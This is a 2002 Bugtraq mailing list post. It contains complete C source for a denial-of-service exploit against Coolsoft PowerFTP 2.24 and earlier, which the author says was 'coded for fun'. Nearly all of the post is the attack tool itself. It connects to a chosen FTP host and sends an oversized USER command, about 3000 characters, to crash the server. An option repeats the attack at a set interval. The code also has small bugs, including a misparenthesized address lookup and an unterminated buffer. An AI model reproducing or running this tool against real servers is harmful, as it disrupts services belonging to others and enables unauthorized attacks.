Bugtraq mailing list archives

Coolsoft PowerFTP <= v2.24 Denial of Service (Linux Source)

From: "a b" <p0pt4rtz () hotmail com>
Date: Sat, 12 Oct 2002 00:20:55 -0700

Coded for fun.. I had nothing else to code and had nothing else to do. :P
I coded it cause Armand released C source that wuz for Windows.

Enjoy,
--p0pt4rtz

/*uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!
*                                                    uNF!
* PowerFTP Denial of Service (Linux Source)          uNF!
* by p0pt4rtz of Trippin Smurfs                      uNF!
* --                                                 uNF!
* Coded for fun :p                                   uNF!
*                                                    uNF!
*uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!
*/

#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <strings.h>
#include <errno.h>

#define VAR   "USER "
#define TITLE "\E[37m"
#define p0p   "\E[33;1m"
#define SMURF "\E[36m"
#define NORM  "\E[m"

struct hostent *he;
struct sockaddr_in sck;

//function declarations
void usage(char *progname);
int conn();
int sdos();
size_t resolve(char *name);
void interm(size_t freedom);
void kconn();
void oconn();

//global vars
int verbose;
int sock;
size_t port, sleepy=0;
char *host=NULL;

void
usage(char *progname)
{
fprintf(stderr, "\xac usage: %s <options> -d <host>\n\n"

"-----------.----------------------------------------------\n""-d <host> | remote host to connect to. (default:127.0.0.1)\n"

               "-p <#port> | remote port to connect to. (default: 21)\n"
               "-s <#secs> | reattack after n seconds.\n"
               "-v         | verbosity. twice for greater effect.\n"
               "-h         | this help for this lame ass program.\n"
               "           '\n\n", progname);
}


int
conn()
{
 int ip;

 if (ip=(resolve(host) == 0)) {
   perror("resolve");
   return -1;
 }

 if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
   perror("socket");
   return -1;
 }


 sck.sin_family = AF_INET;
 sck.sin_port = htons(port);
 sck.sin_addr.s_addr = ip;
 memset(&(sck.sin_zero), '\0', 8);

if (connect(sock, (struct sockaddr *)&sck, sizeof(struct sockaddr)) == -1){

   perror("connect");
   return -1;
 }


return 0; //everything's ok..
}

int
sdos()
{
 int z;
 char sugawh[3006];

 sprintf(sugawh, VAR);

 for(z=5;z<3000;z++)
   sugawh[z]='i';

 if ((send(sock, sugawh, strlen(sugawh), 0)) == -1) {
   perror("send");
   return -1;

 }

return 0; //sugawh!
}

size_t
resolve(char *name)
{
   struct hostent *he;
   unsigned int ip;

   if((ip=inet_addr(name))==(-1))
   {
       if((he=gethostbyname(name))==0)
           return 0;
       memcpy(&ip,he->h_addr,4);
   }
   return ip;
}


void
interm(size_t freedom)
{
 int i;

 if (verbose!=0) fprintf(stderr, "Sleeping. Standby...\r"); fflush(stderr);
 for (i=1; i<= freedom; i++) {
   sleep(1);
     if (verbose >=2)

fprintf(stderr,"Sleep progress : %d Seconds out of %d \r", i,freedom);

       fflush(stderr);
 }

if (verbose!=0) fprintf(stderr, "Done! \r");fflush(stderr);


}

void
kconn()
{
 int a=0,b=0;

 while(!0)
 {

fprintf(stderr, "\xb9\tConnecting..\r");

   fflush(stderr);
   if ((conn())==-1)
     exit(1);

fprintf(stderr, "\xb2\tSending sugawh to dis bish..\r");

   fflush(stderr);
   if ((sdos())==-1)
     exit(1);

   close(sock); //close em legs :p
   fflush(stderr);

fprintf(stderr, "\xb3\tDone!\r");

   fflush(stderr);

   interm(sleepy);

 }
}

void
oconn()
{

fprintf(stderr, "\xb9\tConnecting..\r");

 fflush(stderr);
 if ((conn())==-1)
   exit(1);

fprintf(stderr, "\xb2\tSending sugawh to dis bish..\r");

 fflush(stderr);
 if ((sdos())==-1)
   exit(1);

 close(sock); //close em legs :p

 fflush(stderr);

fprintf(stderr, "\xb3\tDone!\r");

 fflush(stderr);

 printf("\n\n");
}

int
main(int argc, char *argv[])
{
 char c;

fprintf(stderr, "\n" TITLE "PowerFTP <= 2.24 Denial of Service (LinuxSource)" NORM "\n""by " p0p "p0pt4rtz" NORM " of " SMURF "Trippin Smurfs"NORM "\n"

                 "coded for fun :p\n\n");

 if (argc<2) {
   usage(argv[0]);
   exit(1);
 }


 while ((c=getopt(argc, argv, "d:p:s:vh")) != EOF)
 {
   switch(c)
   {
     case 'd': {
       if (strlen(optarg) > 2000) {
         fprintf(stdout, "too long of a hostname: %s\n", optarg);
         exit(1);
       }
       host = optarg;

       break;
     }

     case 'p': {
       port = (optarg==NULL) ? 80 : atoi(optarg);
       if ( port<=0 || port > 65535 ) {
         fprintf(stderr, "invalid portno assignment.\n");
         exit(1);
       }
     break;
     }

     case 's': {
       sleepy = atoi(optarg);
       break;
     }

     case 'v': {
       verbose += 1;
       break;
     }

     case 'h': {
       usage(argv[0]);
       exit(1);
       break;
     }
   }
 }

 if (host==NULL) {
   fprintf(stderr, "no host specified, using default 127.0.0.1\n\n");
   host="127.0.0.1";
 }

 fprintf(stderr,
    "attack information:\n"
    "'''''''''''''''''''\n"
    "remote host: %s\n"
    "remote port: %d\n", host, port);
 if (sleepy!=0)
   fprintf(stderr, "attack interm: %d seconds\n", sleepy);
 fprintf(stderr, "-----------------------------\n");

 if (sleepy!=0)
   kconn();
   else
     oconn();

}




_________________________________________________________________

Join the worlds largest e-mail service with MSN Hotmail.http://www.hotmail.com

Current thread:

Coolsoft PowerFTP <= v2.24 Denial of Service (Linux Source) a b (Oct 14)